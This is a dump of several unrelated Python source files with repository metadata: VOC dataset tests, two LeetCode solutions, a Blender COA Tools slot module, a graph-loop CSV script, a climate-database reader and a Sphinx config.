self.assertFalse(obj1 is None)
self.assertListEqual([1, 2, 2, 2], obj1.get_bbox())
self.assertDictEqual(
{
'pose': VOC.VocPose(1).name,
'truncated': True,
'occluded': False,
'difficult': False,
},
obj1.attributes)
obj2 = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocLabel.person.name)
self.assertFalse(obj2 is None)
self.assertListEqual([4, 5, 2, 2], obj2.get_bbox())
self.assertEqual(2, len(item.annotations))
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
def test_can_load_voc_segm(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocSegmentationExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
cls_mask = find(item.annotations,
lambda x: x.type == AnnotationType.mask and \
x.attributes.get('class') == True)
self.assertFalse(cls_mask is None)
self.assertFalse(cls_mask.image is None)
inst_mask = find(item.annotations,
lambda x: x.type == AnnotationType.mask and \
x.attributes.get('instances') == True)
self.assertFalse(inst_mask is None)
self.assertFalse(inst_mask.image is None)
self.assertEqual(2, len(item.annotations))
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
def test_can_load_voc_layout(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocLayoutExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
obj2 = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocLabel.person.name)
self.assertFalse(obj2 is None)
self.assertListEqual([4, 5, 2, 2], obj2.get_bbox())
obj2head = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocBodyPart(1).name)
self.assertTrue(obj2.id == obj2head.group)
self.assertListEqual([5.5, 6, 2, 2], obj2head.get_bbox())
self.assertEqual(2, len(item.annotations))
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
def test_can_load_voc_action(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocActionExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
obj2 = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocLabel.person.name)
self.assertFalse(obj2 is None)
self.assertListEqual([4, 5, 2, 2], obj2.get_bbox())
for action in VOC.VocAction:
attr = obj2.attributes[action.name]
self.assertEqual(attr, action.value % 2)
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
class VocConverterTest(TestCase):
def _test_can_save_voc(self, src_extractor, converter, test_dir,
target_extractor=None):
converter(src_extractor, test_dir)
result_extractor = VocImporter()(test_dir).make_dataset()
if target_extractor is None:
target_extractor = src_extractor
if AnnotationType.label in target_extractor.categories():
self.assertEqual(
target_extractor.categories()[AnnotationType.label].items,
result_extractor.categories()[AnnotationType.label].items)
if AnnotationType.mask in target_extractor.categories():
self.assertEqual(
target_extractor.categories()[AnnotationType.mask].colormap,
result_extractor.categories()[AnnotationType.mask].colormap)
self.assertEqual(len(target_extractor), len(result_extractor))
for item_a, item_b in zip(target_extractor, result_extractor):
self.assertEqual(item_a.id, item_b.id)
self.assertEqual(len(item_a.annotations), len(item_b.annotations))
for ann_a, ann_b in zip(item_a.annotations, item_b.annotations):
self.assertEqual(ann_a.type, ann_b.type)
def _test_can_save_voc_dummy(self, extractor_type, converter, test_dir):
dummy_dir = osp.join(test_dir, 'dummy')
generate_dummy_voc(dummy_dir)
gen_extractor = extractor_type(dummy_dir)
self._test_can_save_voc(gen_extractor, converter,
osp.join(test_dir, 'converted'))
def test_can_save_voc_cls(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocClassificationExtractor, VocClassificationConverter(label_map='voc'),
test_dir.path)
def test_can_save_voc_det(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocDetectionExtractor, VocDetectionConverter(label_map='voc'),
test_dir.path)
def test_can_save_voc_segm(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocSegmentationExtractor, VocSegmentationConverter(label_map='voc'),
test_dir.path)
def test_can_save_voc_layout(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocLayoutExtractor, VocLayoutConverter(label_map='voc'),
test_dir.path)
def test_can_save_voc_action(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocActionExtractor, VocActionConverter(label_map='voc'),
test_dir.path)
def test_can_save_dataset_with_no_subsets(self):
class TestExtractor(Extractor):
def __iter__(self):
return iter([
DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=2, id=1),
BboxObject(2, 3, 4, 5, label=3, id=2),
]),
DatasetItem(id=2, annotations=[
BboxObject(5, 4, 6, 5, label=3, id=1),
]),
])
def categories(self):
return VOC.make_voc_categories()
with TestDir() as test_dir:
self._test_can_save_voc(TestExtractor(), VocConverter(label_map='voc'),
test_dir.path)
def test_dataset_with_voc_labelmap(self):
class SrcExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
BboxObject(1, 2, 3, 4, label=1, id=2),
])
def categories(self):
label_cat = LabelCategories()
label_cat.add(VOC.VocLabel(1).name)
label_cat.add('non_voc_label')
return {
AnnotationType.label: label_cat,
}
class DstExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
])
def categories(self):
return VOC.make_voc_categories()
with TestDir() as test_dir:
self._test_can_save_voc(
SrcExtractor(), VocConverter(label_map='voc'),
test_dir.path, target_extractor=DstExtractor())
def test_dataset_with_guessed_labelmap(self):
class SrcExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
BboxObject(1, 2, 3, 4, label=1, id=2),
])
def categories(self):
label_cat = LabelCategories()
label_cat.add(VOC.VocLabel(1).name)
label_cat.add('non_voc_label')
return {
AnnotationType.label: label_cat,
}
class DstExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
BboxObject(1, 2, 3, 4,
label=self.categories()[AnnotationType.label] \
.find('non_voc_label')[0], id=2),
])
def categories(self):
label_map = VOC.make_voc_label_map()
label_map['non_voc_label'] = [None, [], []]
for label_desc in label_map.values():
label_desc[0] = None # rebuild colormap
return VOC.make_voc_categories(label_map)
with TestDir() as test_dir:
self._test_can_save_voc(
SrcExtractor(), VocConverter(label_map='guess'),
test_dir.path, target_extractor=DstExtractor())
def test_dataset_with_fixed_labelmap(self):
class SrcExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
BboxObject(1, 2, 3, 4, label=1, id=2, group=2,
attributes={'act1': True}),
BboxObject(2, 3, 4, 5, label=2, id=3, group=2),
BboxObject(2, 3, 4, 6, label=3, id=4, group=2),
])
def categories(self):
label_cat = LabelCategories()
label_cat.add('foreign_label')
label_cat.add('label', attributes=['act1', 'act2'])
label_cat.add('label_part1')
label_cat.add('label_part2')
return {
AnnotationType.label: label_cat,
}
label_map = {
'label': [None, ['label_part1', 'label_part2'], ['act1', 'act2']]
}
class DstExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(1, 2, 3, 4, label=0, id=2, group=2,
attributes={'act1': True, 'act2': False}),
BboxObject(2, 3, 4, 5, label=1, id=3, group=2),
BboxObject(2, 3, 4, 6, label=2, id=4, group=2),
])
def categories(self):
return VOC.make_voc_categories(label_map)
with TestDir() as test_dir:
self._test_can_save_voc(
SrcExtractor(), VocConverter(label_map=label_map),
test_dir.path, target_extractor=DstExtractor())
class VocImporterTest(TestCase):
def test_can_import(self):
with TestDir() as test_dir:
dummy_dir = osp.join(test_dir.path, 'dummy')
subsets = generate_dummy_voc(dummy_dir)
dataset = Project.import_from(dummy_dir, 'voc').make_dataset()
self.assertEqual(len(VOC.VocTask), len(dataset.sources))
self.assertEqual(set(subsets), set(dataset.subsets()))
self.assertEqual(
sum([len(s) for _, s in subsets.items()]),
len(dataset))
class VocFormatTest(TestCase):
def test_can_write_and_parse_labelmap(self):
src_label_map = VOC.make_voc_label_map()
src_label_map['qq'] = [None, ['part1', 'part2'], ['act1', 'act2']]
with TestDir() as test_dir:
file_path = osp.join(test_dir.path, 'test.txt')
VOC.write_label_map(file_path, src_label_map)
dst_label_map = VOC.parse_label_map(file_path)
self.assertEqual(src_label_map, dst_label_map) | [
"[email protected]"
] | |
28735579103adaecd3f593cd35e4b4f802cb9c28 | d7e0b198c216fc877ec94c4279d837bfbc6bccfc | /linkedlist/PartitionLinkedList.py | 8167452d449622e2bbb3d9c338d1a821e2931df0 | [
"MIT"
] | permissive | choiking/LeetCode | dcdb467e25ad6455156a9e2620dd98fabdf9c28b | 08a7ad6af2449e4268fce86823cbf667bbed2ae8 | refs/heads/master | 2021-07-11T15:46:01.841530 | 2017-10-12T23:34:45 | 2017-10-12T23:34:45 | 107,908,853 | 1 | 0 | null | 2017-10-22T22:48:30 | 2017-10-22T22:48:30 | null | UTF-8 | Python | false | false | 936 | py | # Definition for singly-linked list.
# Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.
# You should preserve the original relative order of the nodes in each of the two partitions.
# Given 1->4->3->2->5->2 and x = 3,
# return 1->2->2->4->3->5.
# Approach:
# Create two dummy (guard) head nodes, one per partition.
# Walk the list with two tail pointers, appending each node to the
# matching partition, then link the tail of the "small" list to the head
# of the "large" list and return the first guard node's next.
class Solution(object):
def partition(self, head, x):
small, large = ListNode(0), ListNode(0)
cur1, cur2 = small, large
while head:
if head.val < x:
cur1.next = head
cur1 = cur1.next
else:
cur2.next = head
cur2 = cur2.next
head = head.next
cur2.next = None
cur1.next = large.next
return small.next
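
# Illustrative usage sketch (added for this writeup, not part of the
# original solution; the helper names are assumptions):
def _build_list(values):
    head = ListNode(0)
    cur = head
    for v in values:
        cur.next = ListNode(v)
        cur = cur.next
    return head.next

def _to_values(head):
    out = []
    while head:
        out.append(head.val)
        head = head.next
    return out

if __name__ == '__main__':
    result = Solution().partition(_build_list([1, 4, 3, 2, 5, 2]), 3)
    print(_to_values(result))  # expected: [1, 2, 2, 4, 3, 5]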
| [
"[email protected]"
] | |
956bc15b1abb68df95f0d064267eda4a0caead0b | 4face76e61792656870d79740d46c3350a22e2c5 | /MedianOfTwoSortedArrays.py | 4d3c3e2a2c3040dfc8101c10b7a2f67b2b6e3917 | [] | no_license | juhideshpande/LeetCode | 268d0b8d3557d558d7dbd11ba598eaa09f16c515 | 0be5b51e409ae479284452ab24f55b7811583653 | refs/heads/master | 2023-02-17T23:26:43.326424 | 2021-01-21T04:38:05 | 2021-01-21T04:38:05 | 271,307,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
m, n = len(nums1), len(nums2)
if (m > n):
return self.findMedianSortedArrays(nums2, nums1)
        half = (m + n) // 2  # floor division: correct under both Python 2 and 3
lo, hi = 0, m
while lo <= hi:
            i = lo + (hi - lo) // 2
j = half - i
if i > lo and nums1[i - 1] > nums2[j]:
hi = i - 1
elif i < hi and nums2[j - 1] > nums1[i]:
lo = i + 1
else:
if i == m:
minRight = nums2[j]
elif j == n:
minRight = nums1[i]
else:
minRight = min(nums2[j], nums1[i])
if (m + n) % 2 != 0: # If there are odd elements.
return minRight
if i == 0:
maxLeft = nums2[j - 1]
elif j == 0:
maxLeft = nums1[i - 1]
else:
maxLeft = max(nums1[i - 1], nums2[j - 1])
return (maxLeft + minRight) * 0.5
# Time Complexity O(log(min(m,n))) Space Complexity: O(1)
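
# Illustrative usage sketch (added for this writeup; the inputs below are
# assumptions covering the odd- and even-length cases):
if __name__ == '__main__':
    s = Solution()
    print(s.findMedianSortedArrays([1, 3], [2]))     # expected: 2
    print(s.findMedianSortedArrays([1, 2], [3, 4]))  # expected: 2.5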
| [
"[email protected]"
] | |
420c189fce6c75d1524cf77d368de8fba5389406 | 2019f400e7f081ea49103e9896824185f26faf9c | /coa_tools/operators/slot_handling.py | 73e83719bb5015e3d19044b429c8952a8f394915 | [] | no_license | Takuyax/myblendercontrib | 7c9636d8acfc1aa75889a8e53af7768759a6cd56 | c465a75bce6f7d096cca22076c4c3e92b0045106 | refs/heads/master | 2020-06-22T20:44:26.936818 | 2019-07-18T04:33:47 | 2019-07-18T04:33:47 | 198,394,845 | 0 | 0 | null | 2019-07-23T09:11:12 | 2019-07-23T09:11:11 | null | UTF-8 | Python | false | false | 9,905 | py | '''
Copyright (C) 2015 Andreas Esau
[email protected]
Created by Andreas Esau
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import bpy
import bpy_extras
import bpy_extras.view3d_utils
from math import radians
import mathutils
from mathutils import Vector, Matrix, Quaternion
import math
import bmesh
from bpy.props import FloatProperty, IntProperty, BoolProperty, StringProperty, CollectionProperty, FloatVectorProperty, EnumProperty, IntVectorProperty
import os
from bpy_extras.io_utils import ExportHelper, ImportHelper
import json
from bpy.app.handlers import persistent
from .. import functions
class COATOOLS_OT_ExtractSlots(bpy.types.Operator):
bl_idname = "coa_tools.extract_slots"
bl_label = "Extract Slots"
bl_description = ""
bl_options = {"REGISTER"}
@classmethod
def poll(cls, context):
return True
def execute(self, context):
obj = context.active_object
active_collection = bpy.data.collections[context.scene.coa_tools.active_collection]
if obj.type == "MESH" and obj.coa_tools.type == "SLOT":
for i,slot in enumerate(obj.coa_tools.slot):
name = obj.name +"_"+ str(i).zfill(2)
ob = obj.copy()
functions.link_object(context, ob)
ob.name = name
ob.coa_tools.type = "MESH"
ob.data = slot.mesh
for slot in ob.coa_tools.slot:
ob.coa_tools.slot.remove(0)
ob.matrix_world = obj.matrix_world
ob.parent = obj.parent
ob.select_set(True)
context.view_layer.objects.active = ob
active_collection.objects.unlink(obj)
bpy.data.objects.remove(obj)
return {"FINISHED"}
class COATOOLS_OT_CreateSlotObject(bpy.types.Operator):
bl_idname = "coa_tools.create_slot_object"
bl_label = "Create Slot Object"
bl_description = ""
bl_options = {"REGISTER"}
@classmethod
def poll(cls, context):
return True
slot_name: StringProperty(name="Slot Name")
keep_sprite_position: BoolProperty(name="Keep Sprite Position",description="Keeps the sprite at current position by applying a new origin.",default=True)
def draw(self,context):
layout = self.layout
if context.active_object.coa_tools.type == "MESH":
layout.prop(self,"slot_name")
layout.prop(self,"keep_sprite_position")
def invoke(self,context,event):
wm = context.window_manager
return wm.invoke_props_dialog(self)
def objects_are_valid(self,context):
count = 0
for obj in context.selected_objects:
if obj.type != "MESH":
return False
else:
count += 1
if count > 1:
return True
else:
return False
def execute(self, context):
if not self.objects_are_valid(context):
self.report({'INFO'},"Please select at least to Sprites to combine into a slot.")
return{"CANCELLED"}
active_collection = bpy.data.collections[context.scene.coa_tools.active_collection]
name = str(context.active_object.name)
init_obj = bpy.data.objects[context.active_object.name]
objs = context.selected_objects[:]
obj = context.active_object.copy()
functions.link_object(context, obj)
context.view_layer.objects.active = obj
if obj.coa_tools.type == "MESH":
name = self.slot_name
obj.name = self.slot_name
if self.keep_sprite_position:
print("test")
for ob in objs:
slots = []
if ob.coa_tools.type == "MESH":
slots = [ob.data]
elif ob.coa_tools.type == "SLOT":
for slot in ob.coa_tools.slot:
slots.append(slot.mesh)
ob.location[1] = obj.location[1]
for i,slot in enumerate(slots):
ob_tmp = ob.copy()
functions.link_object(context, ob_tmp)
ob_tmp.data = slot
ob_tmp.select_set(True)
### deselect all objects, select the current from iteration
bpy.ops.object.select_all(action='DESELECT')
ob_tmp.select_set(True)
context.view_layer.objects.active = ob_tmp
cursor_location = Vector(context.scene.cursor.location)
context.scene.cursor.location = obj.matrix_world.to_translation()
bpy.ops.object.origin_set(type='ORIGIN_CURSOR')
context.scene.cursor.location = cursor_location
active_collection.objects.unlink(ob_tmp)
bpy.data.objects.remove(ob_tmp)
cursor_location = Vector(context.scene.cursor.location)
context.scene.cursor.location = obj.matrix_world.to_translation()
bpy.ops.object.origin_set(type='ORIGIN_CURSOR')
context.scene.cursor.location = cursor_location
obj.select_set(True)
context.view_layer.objects.active = obj
obj.coa_tools.type = "SLOT"
for sprite in objs:
if sprite != obj:
if sprite.type == "MESH":
item = None
if sprite.coa_tools.type == "MESH":
if sprite.data.name not in obj.coa_tools.slot:
item = obj.coa_tools.slot.add()
else:
item = obj.coa_tools.slot[sprite.data.name]
item.mesh = sprite.data
#item.name = sprite.data.name
item.index = len(obj.coa_tools.slot)-1
if sprite == init_obj:
obj.coa_tools.slot_index = item.index
obj.coa_tools.slot_reset_index = item.index
elif sprite.coa_tools.type == "SLOT" and sprite != init_obj:
for slot in sprite.coa_tools.slot:
item = obj.coa_tools.slot.add()
#item.name = slot.name
item.mesh = slot.mesh
if item != None:
item["active"] = False
obj.coa_tools.slot[0].active = True
### delete original sprite
for sprite in objs:
active_collection.objects.unlink(sprite)
bpy.data.objects.remove(sprite,do_unlink=True)
for i,s in enumerate(obj.coa_tools.slot):
s.index = i
obj.name = name
return {"FINISHED"}
class COATOOLS_OT_MoveSlotItem(bpy.types.Operator):
bl_idname = "coa_tools.move_slot_item"
bl_label = "Move Slot Item"
bl_description = ""
bl_options = {"REGISTER"}
idx: IntProperty()
ob_name: StringProperty()
mode: StringProperty()
@classmethod
def poll(cls, context):
return True
def execute(self, context):
obj = bpy.data.objects[self.ob_name]
if self.mode == "UP":
new_idx = max(self.idx-1,0)
obj.coa_tools.slot.move(self.idx,new_idx)
elif self.mode == "DOWN":
new_idx = min(self.idx+1,len(obj.coa_tools.slot)-1)
obj.coa_tools.slot.move(self.idx,new_idx)
for i,s in enumerate(obj.coa_tools.slot):
s.index = i
return {"FINISHED"}
class COATOOLS_OT_RemoveFromSlot(bpy.types.Operator):
bl_idname = "coa_tools.remove_from_slot"
bl_label = "Remove From Slot"
bl_description = ""
bl_options = {"REGISTER"}
idx: IntProperty()
ob_name: StringProperty()
@classmethod
def poll(cls, context):
return True
def execute(self, context):
obj = bpy.data.objects[self.ob_name]
active_collection = bpy.data.collections[context.scene.coa_tools.active_collection]
slot = obj.coa_tools.slot[self.idx]
active_idx = 0
for i,s in enumerate(obj.coa_tools.slot):
if s.active:
active_idx = i
break
obj.coa_tools.slot.remove(self.idx)
active_idx = max(0,(active_idx - 1))
for i,s in enumerate(obj.coa_tools.slot):
s["index"] = i
if len(obj.coa_tools.slot) > 0:
obj.coa_tools.slot[active_idx].active = True
else:
active_collection.objects.unlink(obj)
bpy.data.objects.remove(obj)
# for s in obj.coa_tools.slot:
# if s.index > self.idx:
# s["index"] -= 1
return {"FINISHED"}
| [
"[email protected]"
] | |
c71c927d0ad65e56c35ab4e162cb2d2081b53863 | 371fe9a1fdeb62ad1142b34d732bde06f3ce21a0 | /scripts/make_loop_csv.py | a5b00e1e0c6eb16100a6d2b9acdbb25263ecf479 | [] | no_license | maickrau/rdna_resolution | 971f3b7e803565c9432be69b8e2a2852f55b8b79 | aab42310c31e655cbbc318331082fa3436d69075 | refs/heads/master | 2023-03-03T05:14:33.966930 | 2021-02-17T20:45:20 | 2021-02-17T20:45:20 | 339,851,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,049 | py | #!/usr/bin/python
import sys
graphfile = sys.argv[1]
# loops from stdin
# csv to stdout
node_lens = {}
with open(graphfile) as f:
for l in f:
parts = l.strip().split('\t')
if parts[0] == 'S':
node_lens[parts[1]] = len(parts[2])
lines = []
column_vals = {}
for node in node_lens:
column_vals[node] = set()
for l in sys.stdin:
parts = l.strip().split('\t')
name = parts[0]
nodes = set(parts[1].replace('>', ' ').replace('<', ' ').split(' '))
this_line = [name]
nodestr = name
for node in node_lens:
if node in nodes:
this_line.append(str(node_lens[node]))
column_vals[node].add(node_lens[node])
else:
this_line.append("0")
column_vals[node].add(0)
lines.append(this_line)
header = "node"
for node in node_lens:
if len(column_vals[node]) == 1: continue
header += "," + node
print(header)
for line in lines:
linestr = line[0]
index = 0
for node in node_lens:
index += 1
if len(column_vals[node]) == 1: continue
linestr += "," + line[index]
print(linestr)
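
# Illustrative input sketch (assumed formats, inferred from the parsing
# above rather than taken from a real dataset):
#   graph.gfa segment lines:   S<TAB>node1<TAB>ACGT
#   loop lines on stdin:       loopA<TAB>>node1<node2
# Running `make_loop_csv.py graph.gfa < loops.txt` then prints a CSV whose
# columns are the nodes with more than one observed length across loops.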
| [
"[email protected]"
] | |
a17935821a8b08c407e1e1c9f6530ba43580d57f | e9f3abc6b50c07239264b7d2433fb8624a6dfae8 | /HydroDataDownload/ReadDatabase_SURF_CLI_CHN_MUL_DAY.py | 84e97bbd80d7ea3b137e1e8610a358b480a0321a | [] | no_license | alameday/Python | d41f3cb25a67ac6fec9047a46de91d340b99cc92 | 59251eb9b429750040f3fa57c4fdfd2ac8419380 | refs/heads/master | 2020-04-07T01:26:09.759387 | 2018-10-08T03:34:14 | 2018-10-08T03:34:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,468 | py | #! /usr/bin/env python
# coding=utf-8
# Func. : Read Database of SURF_CLI_CHN_MUL_DAY_V3.0
# Author: Liangjun Zhu
# Date : 2016-4-11
# Email : [email protected]
# Blog : http://zhulj.net/python/2016/04/11/Constructing-SURF_CLI_CHN_MUL_DAY_V3.0-database.html
import datetime
import os
import sqlite3
def get_conn(path):
"""
get connection of Sqlite
:param path: path of Sqlite database
"""
conn = sqlite3.connect(path)
if os.path.exists(path) and os.path.isfile(path):
# print('database in hardware :[{}]'.format(path))
return conn
else:
conn = None
# print('database in memory :[:memory:]')
return sqlite3.connect(':memory:')
def get_cursor(conn):
"""
get cursor of current connection
:param conn: connection of Sqlite
"""
if conn is not None:
return conn.cursor()
else:
return get_conn('').cursor()
def close_all(conn, cu):
"""
close connection and cursor of Sqlite
:param conn: connection of Sqlite
:param cu: cursor of conn
"""
    try:
        if cu is not None:
            cu.close()
    finally:
        if conn is not None:
            conn.close()
def getTablesList(dbpath):
"""
Get all tables' name in Sqlite database
:param dbpath:
:return: table names
"""
conn = sqlite3.connect(dbpath)
cu = get_cursor(conn)
tabs = cu.execute(
"select name from sqlite_master where type = 'table' order by name").fetchall()
tabList = list()
for tab in tabs:
if len(tab[0]) == 6:
tabList.append(tab[0])
close_all(conn, cu)
return tabList
def fetchData(conn, sql):
"""
Query data by sql
:param conn:
:param sql:
:return: data queried
"""
data = list()
if sql is not None and sql != '':
cu = get_cursor(conn)
cu.execute(sql)
r = cu.fetchall()
if len(r) > 0:
for e in range(len(r)):
# print(r[e])
data.append(r[e])
else:
            print('the query [{}] returned no rows!'.format(sql))
return data
def saveToCSV(data, csvPath, flag='climData'):
f = open(csvPath, "w")
title = ''
if flag == 'climData':
title = 'stationID,datetimeBJ,avgPRS,maxPRS,minPRS,avgTEM,maxTEM,minTEM,' \
'avgRHU,minRHU,PRE208,PRE820,PRE,smEVP,lgEVP,avgWIN,maxWIN,maxWINASP,' \
'extWIN,extWINASP,SSD,avgGST,maxGST,minGST\n'
elif flag == 'stationInfo':
title = 'stationID,lat,lon,alti\n'
f.write(title)
for items in data:
itemsStr = ''
if flag == 'stationInfo':
items = items[0]
for item in items:
itemsStr += str(item)
itemsStr += ','
itemsStr = itemsStr[:-1]
itemsStr += '\n'
f.write(itemsStr)
f.close()
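
# Illustrative calls (assumptions matching the flags handled above):
#   saveToCSV(rows, 'S59981.csv')                     -> daily climate rows
#   saveToCSV(rows, 'stationInfo.csv', 'stationInfo') -> station metadata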
def isNum(value):
try:
x = int(value)
except TypeError:
return False
except ValueError:
return False
except Exception:
return False
else:
return True
def QueryDatabase(dbpath, savePath, stationIDs, startTime, endTime):
"""
Query and save data from Sqlite database
:param dbpath:
:param savePath:
:param stationIDs:
:param startTime:
:param endTime:
:return:
"""
tableList = getTablesList(dbpath)
conn = sqlite3.connect(dbpath)
if not os.path.isdir(savePath):
os.mkdir(savePath)
stationInfoCSVPath = savePath + os.sep + 'stationInfo.csv'
stationInfoData = list()
if stationIDs == list():
stationIDs = getTablesList(dbpath)
else:
for i in range(len(stationIDs)):
if isNum(stationIDs[i]):
stationIDs[i] = 'S' + str(stationIDs[i])
else:
stationIDs[i] = 'S' + stationIDs[i]
for tabName in stationIDs:
# tabName = 'S' + stationID
stationID = tabName[1:]
if tabName in tableList:
csvPath = savePath + os.sep + tabName + '.csv'
startT = datetime.datetime(startTime[0], startTime[1], startTime[2])
endT = datetime.datetime(endTime[0], endTime[1], endTime[2])
endT += datetime.timedelta(days=1)
startTStr = startT.strftime("%Y-%m-%d %H:%M:%S")[:10]
endTStr = endT.strftime("%Y-%m-%d %H:%M:%S")[:10]
            # endTStr is one day past the requested end date, so use a
            # half-open range to include the end date exactly once
            fetch_data_sql = '''SELECT * FROM %s WHERE date >= "%s" AND
            date < "%s" ORDER BY date''' % (tabName, startTStr, endTStr)
# print(fetch_data_sql)
data = fetchData(conn, fetch_data_sql)
saveToCSV(data, csvPath)
fetch_station_sql = '''SELECT * FROM stationInfo WHERE stID=%s ''' % stationID
stationInfoData.append(fetchData(conn, fetch_station_sql))
saveToCSV(stationInfoData, stationInfoCSVPath, 'stationInfo')
conn.close()
if __name__ == '__main__':
# Input parameters
SQLITE_DB_PATH = r'C:\z_data\common_GIS_Data\SURF_CLI_CHN_MUL_DAY_V3.0\test.db'
QUERY_STATION_IDs = [59981]
QUERY_DATE_FROM = [1960, 1, 1] # format: Year, Month, Day
QUERY_DATE_END = [2017, 12, 31]
SAVE_PATH = r'D:\tmp\zhulj'
QueryDatabase(SQLITE_DB_PATH, SAVE_PATH, QUERY_STATION_IDs, QUERY_DATE_FROM, QUERY_DATE_END)
| [
"[email protected]"
] | |
0c5d394822fa436e1d98a5195894e6c3d859197d | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/automl_HPOlib/HPOlib-master/docs/source/conf.py | 9f3a4a9d2e6b16ee3550f719177d575f8b6c7a61 | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 8,877 | py | # -*- coding: utf-8 -*-
#
# HPOlib documentation build configuration file, created by
# sphinx-quickstart on Fri Oct 17 17:39:41 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'HPOlib'
copyright = u'2014, Matthias Feurer, Katharina Eggensperger'
